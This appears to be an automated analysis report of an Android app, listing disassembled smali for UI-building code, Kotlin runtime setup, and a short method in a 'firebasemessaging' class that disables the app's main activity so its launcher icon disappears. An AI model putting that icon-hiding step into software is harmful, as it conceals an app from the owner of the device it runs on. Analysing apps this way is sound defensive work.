                        • fontAwesome
                        • Material Icons
                        • materialIcons
                        • style
                        • fontsize
                        • vAlignment
                        • hAlignment
                        • name
                        • singleLine
                        • ellipsize
                        • NONE
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/Object;",
                        4"Ljava/util/Map<",
                        5"Ljava/lang/String;",
                        6"Ljava/lang/Object;",
                        7">;Z)",
                        8"Landroid/view/View;"
                        9}
                        10.end annotation
                        11.annotation system Ldalvik/annotation/Throws;
                        12value = {
                        13Ljava/lang/Exception;
                        14}
                        15.end annotation
                        17invoke-static {p0, p1, p2}, Lanywheresoftware/b4a/objects/ViewWrapper;->build(Ljava/lang/Object;Ljava/util/Map;Z)Landroid/view/View;
                        18move-result-object p0
                        19check-cast p0, Landroid/widget/TextView;
                        21const-string v0, "textColor"
                        22const/4 v1, 0x0
                        23if-eqz p2, :cond_16
                        25invoke-virtual {p0}, Landroid/widget/TextView;->getTextColors()Landroid/content/res/ColorStateList;
                        26move-result-object v2
                        28invoke-static {p0, v0, v2}, Lanywheresoftware/b4a/objects/ViewWrapper;->getDefault(Landroid/view/View;Ljava/lang/String;Ljava/lang/Object;)Ljava/lang/Object;
                        29move-result-object v2
                        30check-cast v2, Landroid/content/res/ColorStateList;
                        31goto/16 :goto_17
                        32cond_16: move-object v2, v1
                        33goto_17:
                        34const-string v3, "typeface"
                        36invoke-interface {p1, v3}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        37move-result-object v3
                        38check-cast v3, Ljava/lang/String;
                        40const-string v4, "."
                        42invoke-virtual {v3, v4}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
                        43move-result v4
                        45const-string v5, "text"
                        46if-eqz v4, :cond_43
                        47if-eqz p2, :cond_3e
                        49invoke-static {}, Lanywheresoftware/b4a/objects/streams/File;->getDirInternal()Ljava/lang/String;
                        50move-result-object v4
                        52sget-object v6, Lanywheresoftware/b4a/BA;->cul:Ljava/util/Locale;
                        54invoke-virtual {v3, v6}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        55move-result-object v3
                        57invoke-static {v4, v3}, Lanywheresoftware/b4a/objects/streams/File;->Combine(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
                        58move-result-object v3
                        60invoke-static {v3}, Landroid/graphics/Typeface;->createFromFile(Ljava/lang/String;)Landroid/graphics/Typeface;
                        61move-result-object v3
                        62goto/16 :goto_7f
                        63cond_3e:
                        64invoke-static {v3}, Lanywheresoftware/b4a/keywords/constants/TypefaceWrapper;->LoadFromAssets(Ljava/lang/String;)Landroid/graphics/Typeface;
                        65move-result-object v3
                        66goto/16 :goto_7f
                        67cond_43:
                        68const-string v4, "FontAwesome"
                        70invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        71move-result v4
                        72if-eqz v4, :cond_5b
                        74sget-object v3, Lanywheresoftware/b4a/objects/TextViewWrapper;->fontAwesomeFile:Ljava/lang/String;
                        76invoke-static {v3}, Lanywheresoftware/b4a/objects/TextViewWrapper;->getTypeface(Ljava/lang/String;)Landroid/graphics/Typeface;
                        77move-result-object v3
                        79const-string v4, "fontAwesome"
                        81invoke-interface {p1, v4}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        82move-result-object v4
                        84invoke-interface {p1, v5, v4}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        85goto/16 :goto_7f
                        86cond_5b:
                        87const-string v4, "Material Icons"
                        89invoke-virtual {v3, v4}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        90move-result v4
                        91if-eqz v4, :cond_73
                        93sget-object v3, Lanywheresoftware/b4a/objects/TextViewWrapper;->materialIconsFile:Ljava/lang/String;
                        95invoke-static {v3}, Lanywheresoftware/b4a/objects/TextViewWrapper;->getTypeface(Ljava/lang/String;)Landroid/graphics/Typeface;
                        96move-result-object v3
                        98const-string v4, "materialIcons"
                        100invoke-interface {p1, v4}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        101move-result-object v4
                        103invoke-interface {p1, v5, v4}, Ljava/util/Map;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        104goto/16 :goto_7f
                        105cond_73: const-class v4, Landroid/graphics/Typeface;
                        107invoke-virtual {v4, v3}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        108move-result-object v3
                        110invoke-virtual {v3, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        111move-result-object v3
                        112check-cast v3, Landroid/graphics/Typeface;
                        113goto_7f:
                        114invoke-interface {p1, v5}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        115move-result-object v4
                        116check-cast v4, Ljava/lang/CharSequence;
                        118invoke-virtual {p0, v4}, Landroid/widget/TextView;->setText(Ljava/lang/CharSequence;)V
                        119const-class v4, Landroid/graphics/Typeface;
                        121const-string v5, "style"
                        123invoke-interface {p1, v5}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        124move-result-object v5
                        125check-cast v5, Ljava/lang/String;
                        127invoke-virtual {v4, v5}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        128move-result-object v4
                        130invoke-virtual {v4, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        131move-result-object v4
                        132check-cast v4, Ljava/lang/Integer;
                        134invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        135move-result v4
                        137const-string v5, "fontsize"
                        139invoke-interface {p1, v5}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        140move-result-object v5
                        141check-cast v5, Ljava/lang/Float;
                        143invoke-virtual {v5}, Ljava/lang/Float;->floatValue()F
                        144move-result v5
                        146invoke-virtual {p0, v5}, Landroid/widget/TextView;->setTextSize(F)V
                        148invoke-virtual {p0, v3, v4}, Landroid/widget/TextView;->setTypeface(Landroid/graphics/Typeface;I)V
                        149const-class v3, Landroid/view/Gravity;
                        151const-string v4, "vAlignment"
                        153invoke-interface {p1, v4}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        154move-result-object v4
                        155check-cast v4, Ljava/lang/String;
                        157invoke-virtual {v3, v4}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        158move-result-object v3
                        160invoke-virtual {v3, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        161move-result-object v3
                        162check-cast v3, Ljava/lang/Integer;
                        164invoke-virtual {v3}, Ljava/lang/Integer;->intValue()I
                        165move-result v3
                        166const-class v4, Landroid/view/Gravity;
                        168const-string v5, "hAlignment"
                        170invoke-interface {p1, v5}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        171move-result-object v5
                        172check-cast v5, Ljava/lang/String;
                        174invoke-virtual {v4, v5}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        175move-result-object v4
                        177invoke-virtual {v4, v1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        178move-result-object v4
                        179check-cast v4, Ljava/lang/Integer;
                        181invoke-virtual {v4}, Ljava/lang/Integer;->intValue()I
                        182move-result v4
                        183or-int/2addr v3, v4
                        185invoke-virtual {p0, v3}, Landroid/widget/TextView;->setGravity(I)V
                        187invoke-interface {p1, v0}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        188move-result-object v0
                        189check-cast v0, Ljava/lang/Integer;
                        191invoke-virtual {v0}, Ljava/lang/Integer;->intValue()I
                        192move-result v0
                        193const v3, -0xf0701
                        194if-eq v0, v3, :cond_f8
                        196invoke-virtual {p0, v0}, Landroid/widget/TextView;->setTextColor(I)V
                        197cond_f8: if-eqz p2, :cond_ff
                        198if-ne v0, v3, :cond_ff
                        200invoke-virtual {p0, v2}, Landroid/widget/TextView;->setTextColor(Landroid/content/res/ColorStateList;)V
                        201cond_ff: if-eqz p2, :cond_10c
                        203const-string v0, "name"
                        205invoke-interface {p1, v0}, Ljava/util/Map;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        206move-result-object v0
                        207check-cast v0, Ljava/lang/String;
                        209invoke-static {p0, v0}, Lanywheresoftware/b4a/objects/TextViewWrapper;->setHint(Landroid/widget/TextView;Ljava/lang/String;)V
                        210cond_10c: const/4 v0, 0x0
                        212invoke-static {v0}, Ljava/lang/Boolean;->valueOf(Z)Ljava/lang/Boolean;
                        213move-result-object v0
                        215const-string v2, "singleLine"
                        217invoke-static {p1, v2, v0}, Lanywheresoftware/b4a/BA;->gm(Ljava/util/Map;Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        218move-result-object v0
                        219check-cast v0, Ljava/lang/Boolean;
                        221invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        222move-result v0
                        224invoke-virtual {p0, v0}, Landroid/widget/TextView;->setSingleLine(Z)V
                        226const-string v0, "ellipsize"
                        228const-string v2, "NONE"
                        230invoke-static {p1, v0, v2}, Lanywheresoftware/b4a/BA;->gm(Ljava/util/Map;Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        231move-result-object p1
                        232check-cast p1, Ljava/lang/String;
                        234invoke-virtual {p1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
                        235move-result v0
                        236if-nez v0, :cond_138
                        238invoke-static {p1}, Landroid/text/TextUtils$TruncateAt;->valueOf(Ljava/lang/String;)Landroid/text/TextUtils$TruncateAt;
                        239move-result-object p1
                        241invoke-virtual {p0, p1}, Landroid/widget/TextView;->setEllipsize(Landroid/text/TextUtils$TruncateAt;)V
                        242goto/16 :goto_13d
                        243cond_138: if-eqz p2, :cond_13d
                        245invoke-virtual {p0, v1}, Landroid/widget/TextView;->setEllipsize(Landroid/text/TextUtils$TruncateAt;)V
                        246cond_13d: return-object p0
                        APIs
                        • android.content.ComponentName.<init>
                        • com.MrXnxVip.global.firebasemessaging.getPackageManager
                        • android.content.pm.PackageManager.setComponentEnabledSetting
                        • java.lang.Exception.printStackTrace
                        Position Instruction Meta Information
                        0try_start_0: new-instance v0, Landroid/content/ComponentName;
                        1const-class v1, Lcom/MrXnxVip/global/main;
                        3invoke-direct {v0, p0, v1}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
                        5invoke-virtual {p0}, Lcom/MrXnxVip/global/firebasemessaging;->getPackageManager()Landroid/content/pm/PackageManager;
                        6move-result-object v1
                        7const/4 v2, 0x2
                        8const/4 v3, 0x1
                        10invoke-virtual {v1, v0, v2, v3}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
                        11try_end_10: goto/16 :goto_15
                        12catch_11: move-exception v0
                        14invoke-virtual {v0}, Ljava/lang/Exception;->printStackTrace()V
                        15goto_15: return-void
                        APIs
                        • java.util.ArrayList.<init>
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.lang.Integer.valueOf
                        • java.util.Collection.add
                        • java.util.HashMap.<init>
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.<init>
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.<init>
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.put
                        • java.util.HashMap.putAll
                        • java.util.HashMap.putAll
                        • java.util.HashMap.values
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.util.Map.put
                        • java.util.Map.entrySet
                        • java.util.Set.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Map$Entry.getKey
                        • java.util.Map$Entry.getValue
                        • java.lang.Number.intValue
                        • java.lang.Class.getName
                        • java.lang.Integer.valueOf
                        • java.util.HashMap.put
                        • java.util.Map.size
                        • java.util.LinkedHashMap.<init>
                        • java.util.Map.entrySet
                        • java.lang.Iterable.iterator
                        • java.util.Iterator.hasNext
                        • java.util.Iterator.next
                        • java.util.Map$Entry.getKey
                        • java.util.Map$Entry.getValue
                        • java.util.Map.put
                        Strings
                        • boolean
                        • kotlin.Boolean
                        • char
                        • kotlin.Char
                        • byte
                        • kotlin.Byte
                        • short
                        • kotlin.Short
                        • int
                        • kotlin.Int
                        • float
                        • kotlin.Float
                        • long
                        • kotlin.Long
                        • double
                        • kotlin.Double
                        • java.lang.Boolean
                        • java.lang.Character
                        • java.lang.Byte
                        • java.lang.Short
                        • java.lang.Integer
                        • java.lang.Float
                        • java.lang.Long
                        • java.lang.Double
                        • java.lang.Object
                        • kotlin.Any
                        • java.lang.String
                        • kotlin.String
                        • java.lang.CharSequence
                        • kotlin.CharSequence
                        • java.lang.Throwable
                        • kotlin.Throwable
                        • java.lang.Cloneable
                        • kotlin.Cloneable
                        • java.lang.Number
                        • kotlin.Number
                        • java.lang.Comparable
                        • kotlin.Comparable
                        • java.lang.Enum
                        • kotlin.Enum
                        • java.lang.annotation.Annotation
                        • kotlin.Annotation
                        • java.lang.Iterable
                        • kotlin.collections.Iterable
                        • java.util.Iterator
                        • kotlin.collections.Iterator
                        • java.util.Collection
                        • kotlin.collections.Collection
                        • java.util.List
                        • kotlin.collections.List
                        • java.util.Set
                        • kotlin.collections.Set
                        • java.util.ListIterator
                        • kotlin.collections.ListIterator
                        • java.util.Map
                        • kotlin.collections.Map
                        • java.util.Map$Entry
                        • kotlin.collections.Map.Entry
                        • kotlin.jvm.internal.StringCompanionObject
                        • kotlin.String.Companion
                        • kotlin.jvm.internal.EnumCompanionObject
                        • kotlin.Enum.Companion
                        • primitiveFqNames.values
                        • kotlin.jvm.internal.
                        • kotlinName
                        • CompanionObject
                        • .Companion
                        • kotlin.Function
                        Position Instruction Meta Information
                        0new-instance v0, Lkotlin/jvm/internal/ClassReference$Companion;
                        1const/4 v1, 0x0
                        3invoke-direct {v0, v1}, Lkotlin/jvm/internal/ClassReference$Companion;-><init>(Lkotlin/jvm/internal/DefaultConstructorMarker;)V
                        4sput-object v0, Lkotlin/jvm/internal/ClassReference;->Companion:Lkotlin/jvm/internal/ClassReference$Companion;
                        5const/16 v0, 0x17
                        6new-array v0, v0, [Ljava/lang/Class;
                        7const-class v2, Lkotlin/jvm/functions/Function0;
                        8const/4 v3, 0x0
                        9aput-object v2, v0, v3
                        10const-class v2, Lkotlin/jvm/functions/Function1;
                        11const/4 v4, 0x1
                        12aput-object v2, v0, v4
                        13const-class v2, Lkotlin/jvm/functions/Function2;
                        14const/4 v4, 0x2
                        15aput-object v2, v0, v4
                        16const/4 v2, 0x3
                        17const-class v5, Lkotlin/jvm/functions/Function3;
                        18aput-object v5, v0, v2
                        19const/4 v2, 0x4
                        20const-class v5, Lkotlin/jvm/functions/Function4;
                        21aput-object v5, v0, v2
                        22const/4 v2, 0x5
                        23const-class v5, Lkotlin/jvm/functions/Function5;
                        24aput-object v5, v0, v2
                        25const/4 v2, 0x6
                        26const-class v5, Lkotlin/jvm/functions/Function6;
                        27aput-object v5, v0, v2
                        28const/4 v2, 0x7
                        29const-class v5, Lkotlin/jvm/functions/Function7;
                        30aput-object v5, v0, v2
                        31const/16 v2, 0x8
                        32const-class v5, Lkotlin/jvm/functions/Function8;
                        33aput-object v5, v0, v2
                        34const/16 v2, 0x9
                        35const-class v5, Lkotlin/jvm/functions/Function9;
                        36aput-object v5, v0, v2
                        37const-class v2, Lkotlin/jvm/functions/Function10;
                        38const/16 v5, 0xa
                        39aput-object v2, v0, v5
                        40const/16 v2, 0xb
                        41const-class v6, Lkotlin/jvm/functions/Function11;
                        42aput-object v6, v0, v2
                        43const/16 v2, 0xc
                        44const-class v6, Lkotlin/jvm/functions/Function12;
                        45aput-object v6, v0, v2
                        46const/16 v2, 0xd
                        47const-class v6, Lkotlin/jvm/functions/Function13;
                        48aput-object v6, v0, v2
                        49const/16 v2, 0xe
                        50const-class v6, Lkotlin/jvm/functions/Function14;
                        51aput-object v6, v0, v2
                        52const/16 v2, 0xf
                        53const-class v6, Lkotlin/jvm/functions/Function15;
                        54aput-object v6, v0, v2
                        55const/16 v2, 0x10
                        56const-class v6, Lkotlin/jvm/functions/Function16;
                        57aput-object v6, v0, v2
                        58const/16 v2, 0x11
                        59const-class v6, Lkotlin/jvm/functions/Function17;
                        60aput-object v6, v0, v2
                        61const/16 v2, 0x12
                        62const-class v6, Lkotlin/jvm/functions/Function18;
                        63aput-object v6, v0, v2
                        64const/16 v2, 0x13
                        65const-class v6, Lkotlin/jvm/functions/Function19;
                        66aput-object v6, v0, v2
                        67const/16 v2, 0x14
                        68const-class v6, Lkotlin/jvm/functions/Function20;
                        69aput-object v6, v0, v2
                        70const/16 v2, 0x15
                        71const-class v6, Lkotlin/jvm/functions/Function21;
                        72aput-object v6, v0, v2
                        73const/16 v2, 0x16
                        74const-class v6, Lkotlin/jvm/functions/Function22;
                        75aput-object v6, v0, v2
                        77invoke-static {v0}, Lkotlin/collections/CollectionsKt;->listOf([Ljava/lang/Object;)Ljava/util/List;
                        78move-result-object v0
                        79check-cast v0, Ljava/lang/Iterable;
                        80new-instance v2, Ljava/util/ArrayList;
                        82invoke-static {v0, v5}, Lkotlin/collections/CollectionsKt;->collectionSizeOrDefault(Ljava/lang/Iterable;I)I
                        83move-result v5
                        85invoke-direct {v2, v5}, Ljava/util/ArrayList;-><init>(I)V
                        86check-cast v2, Ljava/util/Collection;
                        88invoke-interface {v0}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        89move-result-object v0
                        90goto_a3:
                        91invoke-interface {v0}, Ljava/util/Iterator;->hasNext()Z
                        92move-result v5
                        93if-eqz v5, :cond_c3
                        95invoke-interface {v0}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        96move-result-object v5
                        97add-int/lit8 v6, v3, 0x1
                        98if-gez v3, :cond_b4
                        100invoke-static {}, Lkotlin/collections/CollectionsKt;->throwIndexOverflow()V
                        101cond_b4: check-cast v5, Ljava/lang/Class;
                        103invoke-static {v3}, Ljava/lang/Integer;->valueOf(I)Ljava/lang/Integer;
                        104move-result-object v3
                        106invoke-static {v5, v3}, Lkotlin/TuplesKt;->to(Ljava/lang/Object;Ljava/lang/Object;)Lkotlin/Pair;
                        107move-result-object v3
                        109invoke-interface {v2, v3}, Ljava/util/Collection;->add(Ljava/lang/Object;)Z
                        110move v3, v6
                        111goto/16 :goto_a3
                        112cond_c3: check-cast v2, Ljava/util/List;
                        113check-cast v2, Ljava/lang/Iterable;
                        115invoke-static {v2}, Lkotlin/collections/MapsKt;->toMap(Ljava/lang/Iterable;)Ljava/util/Map;
                        116move-result-object v0
                        117sput-object v0, Lkotlin/jvm/internal/ClassReference;->FUNCTION_CLASSES:Ljava/util/Map;
                        118new-instance v0, Ljava/util/HashMap;
                        120invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        122const-string v2, "boolean"
                        124const-string v3, "kotlin.Boolean"
                        126invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        128const-string v2, "char"
                        130const-string v5, "kotlin.Char"
                        132invoke-virtual {v0, v2, v5}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        134const-string v2, "byte"
                        136const-string v6, "kotlin.Byte"
                        138invoke-virtual {v0, v2, v6}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        140const-string v2, "short"
                        142const-string v7, "kotlin.Short"
                        144invoke-virtual {v0, v2, v7}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        146const-string v2, "int"
                        148const-string v8, "kotlin.Int"
                        150invoke-virtual {v0, v2, v8}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        152const-string v2, "float"
                        154const-string v9, "kotlin.Float"
                        156invoke-virtual {v0, v2, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        158const-string v2, "long"
                        160const-string v10, "kotlin.Long"
                        162invoke-virtual {v0, v2, v10}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        164const-string v2, "double"
                        166const-string v11, "kotlin.Double"
                        168invoke-virtual {v0, v2, v11}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        169sput-object v0, Lkotlin/jvm/internal/ClassReference;->primitiveFqNames:Ljava/util/HashMap;
                        170new-instance v0, Ljava/util/HashMap;
                        172invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        174const-string v2, "java.lang.Boolean"
                        176invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        178const-string v2, "java.lang.Character"
                        180invoke-virtual {v0, v2, v5}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        182const-string v2, "java.lang.Byte"
                        184invoke-virtual {v0, v2, v6}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        186const-string v2, "java.lang.Short"
                        188invoke-virtual {v0, v2, v7}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        190const-string v2, "java.lang.Integer"
                        192invoke-virtual {v0, v2, v8}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        194const-string v2, "java.lang.Float"
                        196invoke-virtual {v0, v2, v9}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        198const-string v2, "java.lang.Long"
                        200invoke-virtual {v0, v2, v10}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        202const-string v2, "java.lang.Double"
                        204invoke-virtual {v0, v2, v11}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        205sput-object v0, Lkotlin/jvm/internal/ClassReference;->primitiveWrapperFqNames:Ljava/util/HashMap;
                        206new-instance v0, Ljava/util/HashMap;
                        208invoke-direct {v0}, Ljava/util/HashMap;-><init>()V
                        210const-string v2, "java.lang.Object"
                        212const-string v3, "kotlin.Any"
                        214invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        216const-string v2, "java.lang.String"
                        218const-string v3, "kotlin.String"
                        220invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        222const-string v2, "java.lang.CharSequence"
                        224const-string v3, "kotlin.CharSequence"
                        226invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        228const-string v2, "java.lang.Throwable"
                        230const-string v3, "kotlin.Throwable"
                        232invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        234const-string v2, "java.lang.Cloneable"
                        236const-string v3, "kotlin.Cloneable"
                        238invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        240const-string v2, "java.lang.Number"
                        242const-string v3, "kotlin.Number"
                        244invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        246const-string v2, "java.lang.Comparable"
                        248const-string v3, "kotlin.Comparable"
                        250invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        252const-string v2, "java.lang.Enum"
                        254const-string v3, "kotlin.Enum"
                        256invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        258const-string v2, "java.lang.annotation.Annotation"
                        260const-string v3, "kotlin.Annotation"
                        262invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        264const-string v2, "java.lang.Iterable"
                        266const-string v3, "kotlin.collections.Iterable"
                        268invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        270const-string v2, "java.util.Iterator"
                        272const-string v3, "kotlin.collections.Iterator"
                        274invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        276const-string v2, "java.util.Collection"
                        278const-string v3, "kotlin.collections.Collection"
                        280invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        282const-string v2, "java.util.List"
                        284const-string v3, "kotlin.collections.List"
                        286invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        288const-string v2, "java.util.Set"
                        290const-string v3, "kotlin.collections.Set"
                        292invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        294const-string v2, "java.util.ListIterator"
                        296const-string v3, "kotlin.collections.ListIterator"
                        298invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        300const-string v2, "java.util.Map"
                        302const-string v3, "kotlin.collections.Map"
                        304invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        306const-string v2, "java.util.Map$Entry"
                        308const-string v3, "kotlin.collections.Map.Entry"
                        310invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        312const-string v2, "kotlin.jvm.internal.StringCompanionObject"
                        314const-string v3, "kotlin.String.Companion"
                        316invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        318const-string v2, "kotlin.jvm.internal.EnumCompanionObject"
                        320const-string v3, "kotlin.Enum.Companion"
                        322invoke-virtual {v0, v2, v3}, Ljava/util/HashMap;->put(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;
                        324sget-object v2, Lkotlin/jvm/internal/ClassReference;->primitiveFqNames:Ljava/util/HashMap;
                        325check-cast v2, Ljava/util/Map;
                        327invoke-virtual {v0, v2}, Ljava/util/HashMap;->putAll(Ljava/util/Map;)V
                        329sget-object v2, Lkotlin/jvm/internal/ClassReference;->primitiveWrapperFqNames:Ljava/util/HashMap;
                        330check-cast v2, Ljava/util/Map;
                        332invoke-virtual {v0, v2}, Ljava/util/HashMap;->putAll(Ljava/util/Map;)V
                        334sget-object v2, Lkotlin/jvm/internal/ClassReference;->primitiveFqNames:Ljava/util/HashMap;
                        336invoke-virtual {v2}, Ljava/util/HashMap;->values()Ljava/util/Collection;
                        337move-result-object v2
                        339const-string v3, "primitiveFqNames.values"
                        341invoke-static {v2, v3}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        342check-cast v2, Ljava/lang/Iterable;
                        344invoke-interface {v2}, Ljava/lang/Iterable;->iterator()Ljava/util/Iterator;
                        345move-result-object v2
                        346goto_1e4:
                        347invoke-interface {v2}, Ljava/util/Iterator;->hasNext()Z
                        348move-result v3
                        349const/16 v5, 0x2e
                        350if-eqz v3, :cond_22a
                        352invoke-interface {v2}, Ljava/util/Iterator;->next()Ljava/lang/Object;
                        353move-result-object v3
                        354move-object v6, v0
                        355check-cast v6, Ljava/util/Map;
                        356check-cast v3, Ljava/lang/String;
                        357new-instance v7, Ljava/lang/StringBuilder;
                        359invoke-direct {v7}, Ljava/lang/StringBuilder;-><init>()V
                        361const-string v8, "kotlin.jvm.internal."
                        363invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        365const-string v8, "kotlinName"
